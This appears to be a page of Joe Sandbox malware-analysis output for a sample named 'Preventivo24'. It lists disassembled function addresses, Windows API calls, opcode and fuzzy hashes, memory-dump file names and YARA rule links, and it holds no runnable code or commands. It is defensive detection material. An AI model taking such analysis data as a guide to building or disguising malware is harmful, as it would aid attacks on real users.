Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89d43bcd608003b685ae1a0886c5230780c6e278220e293941602e4ddc60863e
Instruction ID: 42c719344361b366c163dc61ed5fe94287d773383705201b468507cae851dfa9
Opcode Fuzzy Hash: 89d43bcd608003b685ae1a0886c5230780c6e278220e293941602e4ddc60863e
Instruction Fuzzy Hash: 6DF14F71E00219DFDF14CF68C990AAEBBF2FF88324F1582A9D955AB391D7309901DB94

Uniqueness

Uniqueness Score: -1.00%

Function 00FE3210 Relevance: 3.2, APIs: 2, Instructions: 151fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,00000000,?,?,00000003,B5580983,00000000,?,00000000), ref: 00FE3304
FindClose.KERNEL32(00000000,?,00000000), ref: 00FE334F

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 4d398e4a4bfbbe200c5d80db638209cf249486eba66db811da41f17ca2e3ab62
Instruction ID: f0f8fd4d254955e4f47d71e79c4a99462c7f282a9378c88e2ba1267077300342
Opcode Fuzzy Hash: 4d398e4a4bfbbe200c5d80db638209cf249486eba66db811da41f17ca2e3ab62
Instruction Fuzzy Hash: E251AE71900649CFDB24DF69C959BAEBBF0FF48314F10411DE829AB381DB349A05CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00FC0AF0 Relevance: 3.1, APIs: 2, Instructions: 145windowCOMMON

Download Yara Rule

APIs

FormatMessageW.KERNEL32(00001300,00000000,00000000,00000400,?,00000000,00000000,B5580983,?,00000000), ref: 00FC0B3B
GetLastError.KERNEL32(?,00000000), ref: 00FC0B45

Part of subcall function 00E8B070: RtlAllocateHeap.NTDLL(?,00000000,?,B5580983,00000000,010B1B00,000000FF,?,?,011C5D3C,?,?,01003AC7,80004005,B5580983,?), ref: 00E8B0BA

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: AllocateErrorFormatHeapLastMessage
String ID:
API String ID: 4114510652-0
Opcode ID: 7cdc16a95ac59c8a30fad74f2f82d5ecdacd9d00365b648a4c376f405212e0b7
Instruction ID: d40a965030d3438621701fb4da4693f37243f5b70e21cb3b329ee8ea2c0e1489
Opcode Fuzzy Hash: 7cdc16a95ac59c8a30fad74f2f82d5ecdacd9d00365b648a4c376f405212e0b7
Instruction Fuzzy Hash: 6741DD71A04209DFDB14DF98C946BAEF7F4EB84728F10026EE819E7380EBB55901CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0101C3F0 Relevance: 3.1, Strings: 2, Instructions: 604COMMON

Download Yara Rule

Strings

Name, xrefs: 0101C80D
{Binary Data}, xrefs: 0101C742

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID:
String ID: Name${Binary Data}
API String ID: 0-874704490
Opcode ID: 55488a2a581f3825642bf7a16b4ee0af06a49b1d10f522cf84f041d8df89451b
Instruction ID: 1fce8c9ced3a5b92089b10db9015aee904f40812033d788837a4e20f8a4f8cd7
Opcode Fuzzy Hash: 55488a2a581f3825642bf7a16b4ee0af06a49b1d10f522cf84f041d8df89451b
Instruction Fuzzy Hash: 0C425B70D00259DFEB28DF68C995BEDBBB5BF58300F1085E9E449A7250EB74AA84CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00F005B0 Relevance: 3.1, APIs: 2, Instructions: 82COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(00000000,000000FC), ref: 00F00634
SetWindowLongW.USER32(00000000,000000FC,?), ref: 00F00642

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: d14574cbb271b09bf62df2df33bbf1001a4e4ba075a37d3d73eab836dd61f7de
Instruction ID: cba8b8a2d957885b8c5e276b3f26d2c973f3a0cde02108dd426e9fae2301d879
Opcode Fuzzy Hash: d14574cbb271b09bf62df2df33bbf1001a4e4ba075a37d3d73eab836dd61f7de
Instruction Fuzzy Hash: C0318C71A05209EFCB14DF58C984B9ABBB5FB44320F1442A9E824AB3D1DB71EE50DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00EC5180 Relevance: 3.0, APIs: 2, Instructions: 10COMMON

Download Yara Rule

APIs

__set_se_translator.LIBVCRUNTIME ref: 00EC5185
SetUnhandledExceptionFilter.KERNEL32(Function_0013C550), ref: 00EC519B

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: ExceptionFilterUnhandled__set_se_translator
String ID:
API String ID: 2480343447-0
Opcode ID: 2529cf519548379e534fa313bec7396bd3c20ea213ca631d02a893b7023a69e0
Instruction ID: 5d9811273046702e7a2749b4a148cea0ec017fdab4b9bc4abf15bbbb45202ca1
Opcode Fuzzy Hash: 2529cf519548379e534fa313bec7396bd3c20ea213ca631d02a893b7023a69e0
Instruction Fuzzy Hash: E3D022A255A380DEE7285331EA08FD13A312720306F480028F0A3002C9C3A268C9ABA3

Uniqueness

Uniqueness Score: -1.00%

Function 01020FB0 Relevance: 1.8, Strings: 1, Instructions: 540COMMON

Download Yara Rule

Strings

gfff, xrefs: 01021664

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID:
String ID: gfff
API String ID: 0-1553575800
Opcode ID: c8b171e9f9ad7d19fa27b1c3aa4130ecd0878394bf6eca5547e8b1d66f430809
Instruction ID: f4f53be90d25581dc8985cf601fbd6ae0489261ab71bc89ffb23902f65db6821
Opcode Fuzzy Hash: c8b171e9f9ad7d19fa27b1c3aa4130ecd0878394bf6eca5547e8b1d66f430809
Instruction Fuzzy Hash: 7D124A347043618BD72C9E2CD98537DBAE7EB84310F28457DEADAC73A5E639C9848346

Uniqueness

Uniqueness Score: -1.00%

Function 00F03B10 Relevance: 1.8, Strings: 1, Instructions: 523COMMON

Download Yara Rule

Strings

unordered_map/set too long, xrefs: 00F03CF5, 00F03EDF

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: ExceptionRaise__floor_pentium4
String ID: unordered_map/set too long
API String ID: 996205981-306623848
Opcode ID: 76ab45cb2f084fcf216f59b810ce5789d918f5392befaaa937033a187f970537
Instruction ID: a941c41affa048a9ae1473bfb260723582f32910bb868a92ef0491e4074faaae
Opcode Fuzzy Hash: 76ab45cb2f084fcf216f59b810ce5789d918f5392befaaa937033a187f970537
Instruction Fuzzy Hash: AA12F6B1A002099FCB19DF68C480AADF7F9FF58310F14C26AE855EB381D735AA55DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00EAEA60 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON

Download Yara Rule

APIs

NtdllDefWindowProc_W.NTDLL(?,-00002000,?,?,00EAD0B8,?,?,?,?,?), ref: 00EAEAB0

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: NtdllProc_Window
String ID:
API String ID: 4255912815-0
Opcode ID: 927feb13cdc196f5ffaeef7c434ff1efa0809a806b8f42bbc0f9bcfd650d0d11
Instruction ID: c8d6322d1391da7eeadcfd83de11e6e8bb92378390c374725b21f8878c316c15
Opcode Fuzzy Hash: 927feb13cdc196f5ffaeef7c434ff1efa0809a806b8f42bbc0f9bcfd650d0d11
Instruction Fuzzy Hash: FBF08230104141DEE3109B98C898B69BFB6FB8E309F4849F6E059E96A0D335EE44DF20

Uniqueness

Uniqueness Score: -1.00%

Function 0106CA10 Relevance: .7, Instructions: 682COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71606fc60c423b215dfd1e9a594d6379437e10fd6a121e32f3f79487c1bccf5e
Instruction ID: 6f8697212b012e0c956a8152f8139990ae8287d873dc46ef177699f7c7c59aac
Opcode Fuzzy Hash: 71606fc60c423b215dfd1e9a594d6379437e10fd6a121e32f3f79487c1bccf5e
Instruction Fuzzy Hash: E122D3B3B543104BD75CCE5DCCA23ADB2D3ABD4218B0E853DB48AC3342EA7DD9598685

Uniqueness

Uniqueness Score: -1.00%

Function 01029470 Relevance: .6, Instructions: 556COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 607c5e2a74256c465c5777d89899451b539b3dde1f9f0e2feecc6d08502e2a0d
Instruction ID: e66d9352cd9adcd2d58ee7d40a51bd791557b0f2ddeed5a5730b54492f9c9c11
Opcode Fuzzy Hash: 607c5e2a74256c465c5777d89899451b539b3dde1f9f0e2feecc6d08502e2a0d
Instruction Fuzzy Hash: 08127C75E002299FCB29DFA8C994AEDBBF6FF48314F194159E855B7380DB30A941CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01020210 Relevance: .4, Instructions: 409COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f12b32f11b2d32ed2570c062379da78de3c0066d191de6cf2909bd3c5e3d7de
Instruction ID: 85e0b3735c949f7114b1246b116384c7dde3212c252a21cdb5d4dc5c1187ecb8
Opcode Fuzzy Hash: 3f12b32f11b2d32ed2570c062379da78de3c0066d191de6cf2909bd3c5e3d7de
Instruction Fuzzy Hash: DCD101717043218FD3648F2CC88466FBBE1ABC8200F688A7EF9D5C7359E675D9458B82

Uniqueness

Uniqueness Score: -1.00%

Function 0109317C Relevance: .4, Instructions: 388COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4fae0d4f3aa79d86d695bebc748bcfaed28b42aeb4cbc542bf46196361377a2b
Instruction ID: 579d419480767cc534400fde3fb96d6718253a622e32e807515e3fd18068a32c
Opcode Fuzzy Hash: 4fae0d4f3aa79d86d695bebc748bcfaed28b42aeb4cbc542bf46196361377a2b
Instruction Fuzzy Hash: 8AE1BA74A006058FCF69CF78C4A06AEBBF1BF49310B108699D5D69F2A0DB30E942EF51

Uniqueness

Uniqueness Score: -1.00%

Function 01092DEE Relevance: .3, Instructions: 344COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fcdc9c03da9466cb1b655bfb909c6de6fbbf13599e9cf62d52e62d46bb3f43b1
Instruction ID: 7aa1a98b4ff908b2f099961fcb97905252e78e1d3e009b1c58f49eb7ae97d5a7
Opcode Fuzzy Hash: fcdc9c03da9466cb1b655bfb909c6de6fbbf13599e9cf62d52e62d46bb3f43b1
Instruction Fuzzy Hash: EAC1DD70A006469FDF69CE6CC4B4ABEBBF1BB45304F144699E5D29B2A1C730A846EB50

Uniqueness

Uniqueness Score: -1.00%

Function 01018800 Relevance: .3, Instructions: 285COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 56f520f23aa322325041f9ed5e0a0737725fae085de3037d42ce6c0d0f24d951
Instruction ID: 589263e38091980af3d32b222bcb86e9284f1f1d5fbaa4694385de48750602e1
Opcode Fuzzy Hash: 56f520f23aa322325041f9ed5e0a0737725fae085de3037d42ce6c0d0f24d951
Instruction Fuzzy Hash: 02919272B043154BD748DE6DCD9136AF6E6ABC8314F1D853EF98AC73A1E678DC048682

Uniqueness

Uniqueness Score: -1.00%

Function 009700AC Relevance: .2, Instructions: 206COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1699048395.0000000000961000.00000004.00000020.00020000.00000000.sdmp, Offset: 00961000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_961000_Preventivo24.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d76326c4be6698980e459206dc65744df1160ca0f83623eddfc7aa26d24581b
Instruction ID: fa20e1eaa0a73cf7df7940708cf9f91567c10fdd6f0aa79d0d38fb8a129e1ce6
Opcode Fuzzy Hash: 3d76326c4be6698980e459206dc65744df1160ca0f83623eddfc7aa26d24581b
Instruction Fuzzy Hash: 1751BBA240E3D58FC3038B3498A56917F71AE97325B9E86DFC8C18F4B3D2695846C362

Uniqueness

Uniqueness Score: -1.00%

Function 009A4836 Relevance: .2, Instructions: 183COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1697655494.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, Offset: 009A2000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_9a2000_Preventivo24.jbxd

Similarity

API ID:
String ID:
API String ID:
